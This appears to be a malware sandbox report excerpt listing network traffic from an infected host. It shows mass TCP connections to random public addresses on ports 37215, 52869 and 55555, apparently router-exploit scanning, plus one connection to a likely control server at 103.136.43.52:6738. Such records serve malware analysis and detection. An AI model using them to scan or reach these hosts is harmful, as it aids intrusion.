    Source: unknownNetwork traffic detected: HTTP traffic on port 46162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39792 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52890 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37522 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48014 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49400 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39334 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37946 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59762 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58124 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53870 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55296 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55296 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52890 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38702 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55296 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48014 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 48970 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45906 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45034 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52384 -> 55555
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.52.170.169:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.175.48.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.184.91.172:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.209.103.228:37215
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.235.181.169:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.14.47.168:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.24.84.24:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.91.127.141:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.143.168.30:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.13.56.231:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.216.2.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.156.12.196:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.99.47.251:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.19.190.58:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.44.226.70:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.38.27.83:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.167.150.28:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.39.250.210:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.165.126.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.95.189.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.244.32.177:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.9.88.42:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.127.239.43:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.147.254.233:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.140.241.98:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.251.155.223:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.255.180.78:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.144.51.254:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.17.83.9:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.47.244.1:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.226.212.167:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.248.243.195:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.233.23.101:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.6.211.89:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.18.2.104:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.66.156.168:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.114.206.204:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.163.8.159:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.202.45.63:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.22.159.196:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.75.62.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.73.227.71:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.114.188.239:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.181.179.73:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.3.80.17:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.40.166.154:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.100.214.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.203.228.213:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.11.86.38:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.150.145.227:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.114.51.35:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.43.113.49:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.52.221.231:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.148.28.207:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.113.93.255:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.144.7.29:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.205.83.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.223.157.46:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.178.9.251:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.233.3.186:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.44.148.76:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.137.24.208:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.76.176.113:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.173.116.226:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.54.233.91:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.210.108.191:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.200.67.214:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.24.219.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.23.93.80:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.36.73.177:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.243.79.74:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.124.202.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.49.85.97:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.72.79.46:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.253.42.56:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.119.221.25:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.236.39.16:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.9.12.60:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.238.91.115:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.73.227.1:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.124.230.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.112.161.148:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.101.106.221:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.32.77.24:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.147.219.23:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.18.48.89:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.138.221.234:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.49.84.149:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.159.181.16:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.135.240.27:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.22.30.165:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.9.155.39:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.41.184.207:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.200.25.213:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.2.204.92:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.136.27.38:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.63.207.243:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.110.237.70:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.32.190.2:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.98.189.60:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.223.219.160:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.102.75.15:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.142.187.143:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.141.99.170:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.42.56.52:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.109.110.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.28.236.170:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.65.12.30:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.134.21.167:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.173.129.163:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.164.176.26:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.8.146.231:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.60.46.169:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.115.67.149:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.178.171.159:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.156.248.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.203.18.33:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.30.209.20:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.72.73.85:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.243.4.213:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.11.191.7:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.126.57.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.149.74.109:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.58.205.111:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.114.44.141:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.181.154.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.192.66.98:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.179.71.50:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.45.150.223:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.66.170.31:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.161.125.184:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.63.227.240:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.16.62.9:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.54.77.67:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.18.116.187:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.0.53.211:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.97.4.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.159.231.138:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.103.89.73:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.89.138.41:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.66.236.79:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.95.152.95:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.179.10.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.4.153.166:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.181.231.48:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.213.168.220:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.83.243.102:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.79.255.167:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.130.103.170:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.59.229.203:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.187.86.39:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.85.43.1:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.217.188.178:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.0.78.85:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.214.77.49:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.2.144.179:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.190.241.44:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.211.68.116:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.63.128.254:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.7.86.59:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 197.220.76.118:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 156.9.152.210:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.19.129.32:52869
    Source: global trafficTCP traffic: 192.168.2.23:12511 -> 41.173.162.54:52869
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.74.9.105:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.146.21.19:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.229.202.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.116.202.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.25.158.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.32.203.100:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.33.211.146:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.216.114.85:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.84.133.77:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.149.103.197:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.179.52.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.26.234.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.90.194.129:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.158.105.153:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.204.100.193:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.247.138.85:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.212.216.95:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.46.157.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.106.41.86:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.65.192.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.139.105.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.102.71.245:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.93.133.221:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.0.153.151:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.176.235.210:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.157.106.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.180.122.139:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.165.226.199:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.208.149.188:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.89.184.148:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.24.191.38:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.206.191.141:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.162.242.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.147.83.30:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.12.246.105:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.0.253.60:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.51.249.113:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.135.169.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.163.106.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.146.23.123:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.63.77.68:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.170.111.43:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.40.32.203:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.18.151.69:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.25.3.40:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.196.189.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.145.13.186:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.45.31.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.151.252.151:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.3.144.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.189.104.118:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.238.226.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.102.252.72:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.150.238.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.233.23.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.138.238.226:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.115.154.54:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.8.157.182:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.101.51.108:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.125.129.20:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.162.216.191:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.49.67.212:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.176.226.190:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.39.254.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.21.119.112:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.43.185.151:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.212.114.89:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.9.156.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.31.37.34:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.14.183.188:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.184.122.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.232.251.21:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.106.202.186:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.225.38.172:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.248.239.200:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.236.178.76:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.4.5.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.217.183.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.91.219.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.157.69.132:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.113.84.87:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.120.35.16:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.160.130.236:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.172.228.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.125.133.135:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.154.213.130:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.17.142.134:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.176.65.151:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.201.52.56:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.241.162.145:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.213.241.10:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.37.104.203:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.194.177.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.204.88.67:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.36.165.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.228.150.244:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.146.134.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.135.173.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.132.37.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.119.97.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.27.132.70:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.167.6.243:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.66.61.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.33.218.126:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.235.187.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.76.90.191:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.68.144.174:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.159.80.229:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.139.100.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.90.133.176:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.208.128.20:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.188.76.131:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.239.139.92:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.194.222.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.110.160.153:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.84.232.69:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.169.164.189:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.200.249.103:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.208.18.26:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.41.76.174:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.199.252.32:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.254.185.56:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.128.253.215:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.64.73.45:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.202.84.234:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.224.120.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.23.98.224:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.172.239.115:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.101.123.160:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.105.190.97:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.118.132.0:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.102.89.229:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.167.147.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.122.124.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.155.11.70:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.158.171.147:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.162.93.14:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.164.60.101:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.167.13.167:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.220.41.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.234.231.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.38.46.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.108.252.112:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.207.240.65:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.104.18.96:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.192.86.31:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.42.246.1:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.91.15.33:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.98.235.181:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.196.105.18:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.166.159.63:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.181.199.5:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.249.216.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.127.70.129:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.40.91.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:13095 -> 157.214.95.112:37215
    Source: global trafficTCP traffic: 192.168.2.23:58374 -> 103.136.43.52:6738
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.91.118.27:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.21.33.230:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.78.168.175:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.231.6.227:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.45.60.20:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.239.41.58:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.132.50.156:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.29.52.79:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.9.153.183:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.215.138.30:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.2.124.8:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.145.101.196:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.2.197.19:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 98.198.197.110:55555
    Source: global trafficTCP traffic: 192.168.2.23:13311 -> 184.101.3.250:55555
